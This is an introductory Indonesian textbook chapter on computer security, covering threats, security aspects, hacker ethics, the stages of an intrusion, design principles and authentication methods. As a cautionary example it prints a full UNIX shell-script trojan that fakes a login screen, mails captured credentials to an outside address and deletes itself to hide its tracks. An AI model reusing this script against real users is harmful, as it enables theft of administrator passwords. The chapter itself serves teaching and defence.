Pendahuluan BAB_________
P EN DA H U LU A N Keamanan sistem komputer secara umum Masalah etika Dasar-dasar gangguan keamanan komputer Prinsip dasar perancangan sistem yang aman
Kebutuhan Akan Keamanan Komputer Masalah keamanan merupakan salah satu aspek penting dari sebuah sistem informasi. Sayang sekali masalah keamanan ini sering kali kurang mendapat perhatian dari para pemilik dan pengelola system informasi. Seringkali masalah keamanan berada di urutan kedua, atau bahkan di urutan terakhir dalam daftar hal-hal yang dianggap penting. Apabila menggangu performansi dari sistem, seringkali keamanan dikurangi atau ditiadakan. Informasi saat ini sudah menjadi sebuah komoditi yang sangat penting. Bahkan ada yang mengatakan bahwa kita sudah berada di sebuah “information-based society”. Kemampuan untuk mengakses dan menyediakan informasi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi, baik yang berupa organisasi komersial (perusahaan), perguruan tinggi, lembaga pemerintahan, maupun individual (pribadi). Hal ini dimungkinkan dengan perkembangan pesat di bidang teknologi komputer dan telekomunikasi. Dahulu, jumlah komputer sangat terbatas dan belum digunakan untuk menyimpan hal-hal yang sifatnya sensitif. Penggunaan komputer untuk menyimpan informasi yang sifatnya classified baru dilakukan di sekitar tahun 1950-an. Sangat pentingnya nilai sebuah informasi menyebabkan seringkali informasi diinginkan hanya boleh diakses oleh orang-orang tertentu. Jatuhnya informasi ke tangan pihak lain (misalnya pihak lawan bisnis) dapat menimbulkan kerugian bagi pemilik informasi. Sebagai contoh, banyak informasi dalam sebuah perusahaan yang hanya diperbolehkan diketahui oleh orang-orang tertentu di dalam perusahaan tersebut, seperti misalnya informasi tentang produk yang sedang dalam development, algoritma-algoritma dan teknik-teknik yang digunakan untuk menghasilkan produk tersebut. Untuk itu keamanan dari sistem informasi yang digunakan harus terjamin dalam batas yang dapat diterima. Jaringan komputer, seperti LAN dan Internet, memungkinkan untuk menyediakan informasi secara cepat. Ini salah satu alas an perusahaan atau organisasi mulai berbondong-bondong membuat LAN untuk sistem
Keamanan Komputer
1
Pendahuluan informasinya dan menghubungkan LAN tersebut ke Internet. Terhubungnya LAN atau komputer ke Internet membuka potensi adanya lubang keamanan (security hole) yang tadinya bisa ditutupi dengan mekanisme keamanan secara fisik. Ini sesuai dengan pendapat bahwa kemudahan (kenyamanan) mengakses informasi berbanding terbalik dengan tingkat keamanan sistem informasi itu sendiri. Semakin tinggi tingkat keamanan, semakin sulit (tidak nyaman) untuk mengakses informasi. Menurut G. J. Simons, keamanan informasi adalah bagaimana kita dapat mencegah penipuan (cheating) atau, paling tidak, mendeteksi adanya penipuan di sebuah sistem yang berbasis informasi, dimana informasinya sendiri tidak memiliki arti fisik. Meningkatnya Kejahatan Komputer Jumlah kejahatan komputer (computer crime), terutama yang berhubungan dengan sistem informasi, akan terus meningkat dikarenakan beberapa hal, antara lain: •
Aplikasi bisnis yang menggunakan (berbasis) teknologi informasi dan jaringan komputer semakin meningkat. Sebagai contoh saat ini mulai bermunculan aplikasi bisnis seperti on-line banking, electronic commerce (e-commerce), Electronic Data Interchange (EDI), dan masih banyak lainnya.
•
Desentralisasi (dan distributed) server menyebabkan lebih banyak sistem yang harus ditangani. Hal ini membutuhkan lebih banyak operator dan administrator yang handal yang juga kemungkinan harus disebar di seluruh lokasi. Padahal mencari operator dan administrator yang handal adalah sangat sulit.
•
Transisi dari single vendor ke multi-vendor sehingga lebih banyak sistem atau perangkat yang harus dimengerti dan masalah interoperability antar vendor yang lebih sulit ditangani. Untuk memahami satu jenis perangkat dari satu vendor saja sudah susah, apalagi harus menangani berjenis-jenis perangkat.
•
Meningkatnya kemampuan pemakai di bidang komputer sehingga mulai banyak pemakai yang mencoba-coba bermain atau membongkar sistem yang digunakannya.
•
Kesulitan dari penegak hukum untuk mengejar kemajuan dunia komputer dan telekomunikasi yang sangat cepat.
•
Semakin kompleksnya sistem yang digunakan, seperti semakin besarnya program (source code) yang digunakan sehingga semakin besar probabilitas terjadinya lubang keamanan (yang disebabkan kesalahan pemrograman).
•
Semakin banyak perusahaan yang menghubungkan sistem informasinya dengan jaringan komputer yang global seperti Internet. Keamanan Komputer
2
Pendahuluan Hal ini membuka akses dari seluruh dunia. Potensi sistem informasi yang dapat dijebol menjadi lebih besar.
Klasifikasi Kejahatan Komputer Menurut David Icove berdasarkan lubang keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu: 1. Keamanan yang bersifat fisik (physical security): termasuk akses orang ke gedung, peralatan, dan media yang digunakan. Beberapa bekas penjahat komputer (crackers) mengatakan bahwa mereka sering pergi ke tempat sampah untuk mencari berkas-berkas yang mungkin memiliki informasi tentang keamanan. Misalnya pernah diketemukan coretan password atau manual yang dibuang tanpa dihancurkan. Wiretapping atau hal-hal yang berhubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini. Denial of service, yaitu akibat yang ditimbulkan sehingga servis tidak dapat diterima oleh pemakai juga dapat dimasukkan ke dalam kelas ini. Denial of service dapat dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diutamakan adalah banyaknya jumlah pesan). Beberapa waktu yang lalu ada lubang keamanan dari implementasi protokol TCP/IP yang dikenal dengan istilah Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan sehingga dia menjadi terlalu sibuk dan bahkan dapat berakibat macetnya sistem (hang). 2. Keamanan yang berhubungan dengan orang (personel): termasuk identifikasi, dan profil resiko dari orang yang mempunyai akses (pekerja). Seringkali kelemahan keamanan sistem informasi bergantung kepada manusia (pemakai dan pengelola). Ada sebuah teknik yang dikenal dengan istilah “social engineering” yang sering digunakan oleh kriminal untuk berpura-pura sebagai orang yang berhak mengakses informasi. Misalnya kriminal ini berpura-pura sebagai pemakai yang lupa passwordnya dan minta agar diganti menjadi kata lain. 3. Keamanan dari data dan media serta teknik komunikasi (communications). Yang termasuk di dalam kelas ini adalah kelemahan dalam software yang digunakan untuk mengelola data. Seorang kriminal dapat memasang virus atau trojan horse sehingga dapat mengumpulkan informasi (seperti password) yang semestinya tidak berhak diakses.
Keamanan Komputer
3
Pendahuluan 4. Keamanan dalam operasi: termasuk prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga termasuk prosedur setelah serangan (post attack recovery).
Aspek Keamanan Komputer Garfinkel mengemukakan bahwa keamanan komputer (computer security) melingkupi empat aspek, yaitu privacy, integrity, authentication, dan availability. Selain keempat hal di atas, masih ada dua aspek lain yang juga sering dibahas dalam kaitannya dengan electronic commerce, yaitu access control dan nonrepudiation. •
Privacy / Confidentiality Inti utama aspek privacy atau confidentiality adalah usaha untuk menjaga informasi dari orang yang tidak berhak mengakses. Privacy lebih kearah data-data yang sifatnya privat sedangkan confidentiality biasanya berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu (misalnya sebagai bagian dari pendaftaran sebuah servis) dan hanya diperbolehkan untuk keperluan tertentu tersebut. Contoh hal yang berhubungan dengan privacy adalah e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator. Contoh confidential information adalah data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) merupakan data-data yang ingin diproteksi penggunaan dan penyebarannya. Contoh lain dari confidentiality adalah daftar pelanggan dari sebuah Internet Service Provider (ISP). Serangan terhadap aspek privacy misalnya adalah usaha untuk melakukan penyadapan (dengan program sniffer). Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan confidentiality adalah dengan menggunakan teknologi kriptografi.
•
Integrity Aspek ini menekankan bahwa informasi tidak boleh diubah tanpa seijin pemilik informasi. Adanya virus, trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin merupakan contoh masalah yang harus dihadapi. Sebuah e-mail dapat saja “ditangkap” (intercept) di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju. Dengan kata lain, integritas dari informasi sudah tidak terjaga. Penggunaan enkripsi dan digital signature, misalnya, dapat mengatasi masalah ini. Salah satu contoh kasus trojan horse adalah distribusi paket program TCP Wrapper (yaitu program populer yang dapat digunakan untuk mengatur dan membatasi akses TCP/IP) yang dimodifikasi oleh orang yang tidak bertanggung jawab. Jika anda memasang program yang Keamanan Komputer
4
Pendahuluan berisi trojan horse tersebut, maka ketika anda merakit (compile) program tersebut, dia akan mengirimkan eMail kepada orang tertentu yang kemudian memperbolehkan dia masuk ke sistem anda. Informasi ini berasal dari CERT Advisory, “CA-99-01 Trojan-TCP-Wrappers” yang didistribusikan 21 Januari 1999. Contoh serangan lain adalah yang disebut “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain. •
Authentication Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud. Masalah pertama, membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking dan digital signature. Watermarking juga dapat digunakan untuk menjaga “intelectual property”, yaitu dengan menandai dokumen atau hasil karya dengan “tanda tangan” pembuat . Masalah kedua biasanya berhubungan dengan access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. Dalam hal ini pengguna harus menunjukkan bukti bahwa memang dia adalah pengguna yang sah, misalnya dengan menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya. Penggunaan teknologi smart card, saat ini kelihatannya dapat meningkatkan keamanan aspek ini.
•
Availability Aspek availability atau ketersediaan berhubungan dengan ketersediaan informasi ketika dibutuhkan. Sistem informasi yang diserang atau dijebol dapat menghambat atau meniadakan akses ke informasi. Contoh hambatan adalah serangan yang sering disebut dengan “denial of service attack” (DoS attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash. Contoh lain adalah adanya mailbomb, dimana seorang pemakai dikirimi e-mail bertubitubi (katakan ribuan email) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan mengakses e-mailnya (apalagi jika akses dilakukan melalui saluran telepon). Bayangkan apabila anda dikirimi 5000 email dan anda harus mengambil (download) email tersebut melalui telepon dari rumah. Serangan terhadap availability dalam bentuk DoS attack merupakan yang terpopuler pada saat naskah ini ditulis.
•
Access Control Aspek ini berhubungan dengan cara pengaturan akses kepada informasi. Hal ini biasanya berhubungan dengan masalah Keamanan Komputer
5
Pendahuluan authentication dan juga privacy. Access control seringkali dilakukan dengan menggunakan kombinasi userid/password atau dengan menggunakan mekanisme lain. •
Non-repudiation Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Sebagai contoh, seseorang yang mengirimkan email untuk memesan barang tidak dapat menyangkal bahwa dia telah mengirimkan email tersebut. Aspek ini sangat penting dalam hal electronic commerce. Penggunaan digital signature dan teknologi kriptografi secara umum dapat menjaga aspek ini. Akan tetapi hal ini masih harus didukung oleh hukum sehingga status dari digital signature itu jelas legal. Hal ini akan dibahas lebih rinci pada bagian tersendiri.
Serangan Terhadap Keamanan Sistem Informasi Security attack, atau serangan terhadap keamanan sistem informasi, dapat dilihat dari sudut peranan komputer atau jaringan komputer yang fungsinya adalah sebagai penyedia informasi. Menurut W.Stallings ada beberapa kemungkinan serangan (attack): •
Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.
•
Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).
•
Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
•
Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.
Hacker, Cracker, dan Etika Untuk mempelajari masalah keamanan, ada baiknya juga mempelajari aspek dari pelaku yang terlibat dalam masalah keamanan ini, yaitu para hackers and crackers. Istilah hackers sendiri masih belum baku karena bagi sebagian orang hackers mempunyai konotasi positif, sedangkan bagi sebagian lain memiliki Keamanan Komputer
6
Pendahuluan konotasi negatif. Bagi kelompok yang pertama (old school), untuk pelaku yang jahat biasanya disebut crackers. Batas antara hacker dan cracker sangat tipis. Batasan ini ditentukan oleh etika. moral, dan integritas dari pelaku sendiri. •
Interpretasi Etika Komputasi Salah satu hal yang membedakan antara crackers dan hackers, atau antara Computer Underground dan Computer Security Industry adalah masalah etika. Keduanya memiliki basis etika yang berbeda atau mungkin memiliki interpretasi yang berbeda terhadap suatu topik yang berhubungan dengan masalah computing. Kembali, Paul Taylor melihat hal ini yang menjadi basis pembeda keduanya. Selain masalah kelompok, kelihatannya umur juga membedakan pandangan (interpretasi) terhadap suatu topik. Salah satu contoh, Computer Security Industry beranggapan bahwa Computer Underground masih belum memahami bahwa “computing” tidak sekedar permainan dan mereka (maksudnya CU) harus melepaskan diri dari “playpen1”. Perbedaan pendapat ini dapat muncul di berbagai topik. Sebagai contoh, bagaimana pendapat anda tentang memperkerjakan seorang hacker sebagai kepala keamanan sistem informasi anda? Ada yang berpendapat bahwa hal ini sama dengan memperkerjakan penjarah (gali, preman) sebagai kepala keamanan setempat. Jika analogi ini disepakati, maka akibat negatif yang ditimbulkan dapat dimengerti. Akan tetapi para computer underground berpendapat bahwa analogi tersebut kurang tepat. Para computer underground berpendapat bahwa hacking lebih mengarah ke kualitas intelektual dan jiwa pionir. Kalau dianalogikan, mungkin lebih ke arah permainan catur dan masa “wild west” (di Amerika jaman dahulu). Perbedaan pendapat juga terjadi dalam masalah “probing”, yaitu mencari tahu kelemahan sebuah sistem. Computer security industry beranggapan bahwa probing merupakan kegiatan yang tidak etis. Sementara para computer underground menganggap bahwa mereka membantu dengan menunjukkan adanya kelemahan dalam sebuah sistem (meskipun sistem tersebut bukan dalam pengelolaannya). Kalau dianalogikan ke dalam kehidupan sehari-hari (jika anda setuju dengan analoginya), bagaimana pendapat anda terhadap seseorang (yang tidak diminta) yang mencoba-coba membuka-buka pintu atau jendela rumah anda dengan alasan untuk menguji keamanan rumah anda.
•
Memahami Hacker Bekerja Sebenarnya ada banyak tahapan dalam melakukan hacking tergantung dari sudut pandang dan pengalaman hacker itu sendiri. Ada yang berpendapat teknik hacking ada 3 tahapan, yaitu tahap persiapan, tahap eksekusi dan tahap post attack, ada juga yang dengan cara
Keamanan Komputer
7
Pendahuluan prepation, lalu execution, dan akhirnya post attack. Secara umum melalui tahapan-tahapan sebagai berikut
Tahap mencari tahu system komputer sasaran.
Tahap penyusupan
Tahap penjelajahan
Tahap keluar dan menghilangkan jejak.
Dalam proses hacking versi Hacking Exposed ada beberapa tahapan. Untuk memeberikan gambaran tentang keseluruhan proses hacking, berikut di sajikan langkah-langkah logisnya secara sederhana. 1. Footprinting. Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran, mencakup pencarian informasi dengan search engine, whois, dan DNS zone transfer. Informasi dikumpulkan dari berbagai tempat, misalnya koran, majalah, search engine, dan lain-lain. 2. Scanning. Terhadap sasaran tertentu, mencari pintu masuk yang paling mungkin. Biasanya menggunakan ping sweep dan port scan. 3. Enumeration. Menelaah secara intensif komputer sasaran, contohnya mencari user account yang absah, network resource and share, dan aplikasi untuk mendapatkan bagian dengan proteksi yang lemah. 4. Gaining Access. Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran, meliputi mengintip dan merampas password, menebak password, serta melakukan buffer overflow. 5. Escalating Privillege. Bila sudah mendapatkan user password, tahap ini diusahakan mendapatkan privillage admin (usaha mendapatkan akses admin) dengan mencoba password cracking atau explosit. 6. Pilfering. Proses mengumpulkan informasi dimulai lagi untuk mengidentifikasi mekanisme untuk mendapatkan akses trusted sistem. 7. Covering Track. Setelah memiliki kontrol penuh terhadap sistem, menutup jejak menjadi prioritas. Tahap ini meliputi membersihkan network log. 8. Creating backdoors. Pintu belakang (port) diciptakan pada berbagai bagian sistem untuk memudahkan masuk kembali ke sistem ini dengan membentuk user account palsu dan menambahkan service lainnya. 9. Denial of Service. Bila usaha diatas gagal, penyerang dapat melumpuhkan sasaran sebagai usaha terakhir, misalnya dengan SYN flood, teknik ICMP, dan lainnya.
Keamanan Komputer
8
Pendahuluan •
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX : Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX. "Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut. Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut diobok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ? Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut: #!/bin/sh ################################### # Nama program : my_login # Deskripsi :Program kuda trojan sederhana # versi 1.0 Nopember 1999 #################################### COUNTER=0 Cat /etc/issue While [ "$COUNTER" –ne 2 ] do let COUNTER=$COIUNTER+1 echo "login: \c" read LOGIN stty echo echo "password: \c" read PASSWORD echo "User $LOGIN : $PASSWORD" | mail
[email protected] stty echo echo echo "Login Incorrect" done rm $0 kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX: Login: Password:
Keamanan Komputer
9
Pendahuluan Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya. Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan Login:root Password: ******** Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX. Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:
[email protected]. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !! Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu rm $0 kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya. Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.
Keamanan Komputer
10
Pendahuluan
Prinsip Dasar Perancangan Sistem Yang Aman Pada prinsipnya dalam merancang sebuah sistem komputer yang aman adalah pencegahan terhadap rusak atau hilangnya data, dan juga pencegahan terhadap masuknya para penyusup baik secara fisik maupun lewat jalur komunikasi. Kehilangan data dapat disebabkan antara lain: •
Bencana, seperti : Kebakaran, Banjir, Gempa bumi, Perang, Kerusuhan, Grogotan tikus pada pita rekaman atau floppy disk.
•
Kesalahan perangkat keras dan perangkat lunak, seperti Ketidakfungsian pemroses, Disk atau tape yang tak terbaca, Kesalahan telekomunikasi, Kesalahan program (bugs)
•
Kesalahan/kelalaian manusia seperti : Kesalahan pemasukkan data, Memasang tape atau disk yang salah, Eksekusi program yang salah, Kehilangan disk atau tape.
Kehilangan data dapat diatasi dengan mengelola beberapa backup dan backup ditempatkan jauh dari data yang online. Sementara itu mengenai penyusup dapat dikatagorikan menjaadi dua, yaitu Penyusup pasif, yaitu yang membeca data yang tak diotorisasi dan Penyusup aktif, yaitu mengubah data yang tak diotorisasi. Kategori penyusupan •
Lirikan mata pemakai non-teknis. Pada sistem time-sharing, kerja pemakai dapat diamati orang sekelilingnya. Bila dengan lirikan itu dapat mengetahui apa yang diketik saat pengisian password , maka pemakai non-teknis dapat mengakses fasilitas yang bukan haknya.
•
Penyadapan oleh orang dalam.
•
Usaha hacker dalam mencari uang.
•
Spionase militer atau bisnis.
Petunjuk Pengamanan Komputer Saltzer dan Schoorder (1975) memberi petunjuk mengenai prinsip-prinsip pengamanan sistem komputer, yaitu: •
Rancangan sistem seharusnya publik. Keamanan sistem seharusnya tidask bergantung pada kerahasiaan rancangan mekanisme pengamanan. Mengasumsikan penyusup tidak akan mengetahui cara kerja sistem pengamanan hanya menipu/memperdaya perancang sehingga tidak membuat mekanisme proteksi yang bagus.
•
Dapat diterima. Sistem yang dipilih harus dapat diterima secara psikologis. Mekanisme proteksi seharusnya tidak mengganggu kerja pemakai dan memenuhi kebutuhan otorisasi pengaksesan. Jika Keamanan Komputer
11
Pendahuluan mekanisme tidak mudah digunakan maka tidak akan digunakan atau digunakan secara tidak benar. •
Pemeriksaan Otoritas Saat Itu Sistem tidak seharusnya memeriksa ijin dan menyatakan pengaksesan diijinkan, serta kemudian menetapkan terus informasi ini untuk penggunaan selanjutnya. Banyak sistem memeriksa ijin ketika file dibuka dan setelah itu (operasi-operasi lain) tidak diperiksa. Pemakai yang membuka file dan lupa menutup file akan terus dapat di walau pemilik file telah mengubah atribut proteksi file.
•
Kewenangan Serendah Mungkin. Program atau pemakai sistem seharusnya beroperasi dengan kumpulan wewenang serendah mungkin yeng diperlukan untuk menyelesaikan tugasnya. Default sistem yang digunakan harus tidak ada akses sama sekali.
•
Mekanisme Yang Ekonomis. Mekanisme proteksi seharusnya sekecil, sesederhana mungkin dan seragam sehingga memudahkan verifikasi. Proteksi seharusnya dibangun di lapisan terbawah. Proteksi merupakan bagian integral rancangan sistem, bukan mekanisme yang ditambahkan pada rancangan yang telah ada.
Otentifikasi Pemakai Kebanyakan proteksi didasarkan asumsi sistem mengetahui identitas pemakai. Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai (user authentication). Kebanyakan metode otentifikasi didasarkan pada tiga cara, yaitu; •
Sesuatu yang diketahui pemakai, misalnya: Password, Kombinasi kunci, Nama kecil ibu mertua, Dan sebagainya.
•
Sesuatu yang dimiliki pemakai, misalnya; Badge, Kartu identitas, Kunci, Dan sebagainya.
•
Sesuatu mengenai (merupakan ciri) pemakai, misalnya: Sidik jari, Sidik suara, Foto, Tanda tangan dan sebagainya.
•
Identifikasi Fisik Pendekatan ini adalah memeriksa yang dimiliki pemakai. ¾ Kartu Berpita Magnetik Kartu pengenal dengan selarik pita magnetik. Kartu ini disisipkan ke suatu perangkat pembaca kartu magnetik jika akan mengakses komputer. Teknik ini biasanya dikombinasikan dengan password, sehingga pemakai dapat login sistem komputer bila memenuhi dua syarat berikut: 1. Mempunyai kartu. 2. Mengetahui password yang spesifik kartu itu. Keamanan Komputer
12
Pendahuluan ATM merupakan mesin yang bekerja dengan cara ini. •
Sidik Fisik Pendekatan lain adalah menyangkut ciri fisik yang sulit ditiru seperti:
•
Sidik jari dan sidik suara.
Analisis panjang jari.
Pengenalan visual dengan menggunakan kamera diterapkan.
Dan sebagainya.
Analisis Tanda Tangan Disediakan papan dan pen khusus dimana pemakai menulis tanda tangan. Pada teknik ini, bukan membandingkan bentuk tanda-tangan tapi gerakan (arah) dan tekanan pada saat menulis. Seseorang dapat meniru bentuk tanda tangan tapi sulit meniru persis cara (gerakan dinamis dasn irama tekanan) saat pembuatan tanda tangan.
•
Analisis Suatu yang Dipunyai Pemakai Pendekatan lain adalah meniru tanda perilaku kucing dan anjing dalam menandai batas wilayah, yaitu urine. Disediakan alat urinalysis. Bila pemakai ingin login, maka pemakai harus membawa sampel urinenya. Sampel urine dimasukkan ke tabung dan segera dilakukan analisis dan menentukan apakah termasuk salah satu pemakai sistem. Urinalysis harus dapat dilakukan sesaat. Pendekatan pengamanan yang bagus, tapi tidak diterima secara psikologis. Analisis Darah. Disediakan satu jarum dimana pemakai dapat mencobloskan jari sampai menetes darahnya. Darah itu kemudian dianalisis dengan spektografi (Blood spectographic analysis). Dari analis itu dapat ditentukan mengenai pemilik darah. Pendekatan ini relaif aman tapi tidak diterima secara psikologis.
Pembatasan Pembatasan-pembatasan dapat dilakukan sehingga memperkecil peluang penembusan oleh pamakai yang tak diotorisasi. Misalnya: Pembatasan login, Login hanya dibolehkan:
•
Pada terminal tertentu.
Hanya pada waktu dan hari tertentu.
Pembatasan Dengan Call-back Login dapat dilakukan siapapun. Bila telah sukses login, sistem segera memutuskan koneksi dan memanggil nomor telepon yang telah Keamanan Komputer
13
Pendahuluan disepakati. Penyusup tidak dapat menghubungi lewat sembarang saluran telepon, tapi hanya pada saluran telepon tertentu saja. •
Pembatasan Jumlah Usaha Login Login dibatasi sampai tiga kali dan segera dikunci dan diberitahu ke administrator. Semua login direkam dan sistem melaporkan informasiinformasi berikut:
Waktu, yaitu waktu pemakai login.
Terminal, yaitu terminal dimana pemakai login.
Mekanisme Proteksi Sistem Komputer Pada sistem komputer banyak objek yang perlu diproteksi. Objek-objek tersebut dapat dikatagorikan menjadi dua, yaitu: Objek perangkat keras dan objek perangkat lunak. •
•
Objek Perangkat Keras , Objek perangkat keras yang perlu diproteksi, antara lain :
Pemroses.
Segment memori.
Terminal.
Disk drive.
Printer.
Dan sebagainya.
Objek Perangkat Lunak. Objek perangkat lunak yang perlu diproteksi, antara lain:
Proses.
File.
Basisdata.
Semaphore.
Dan sebagainya.
Keamanan Komputer
14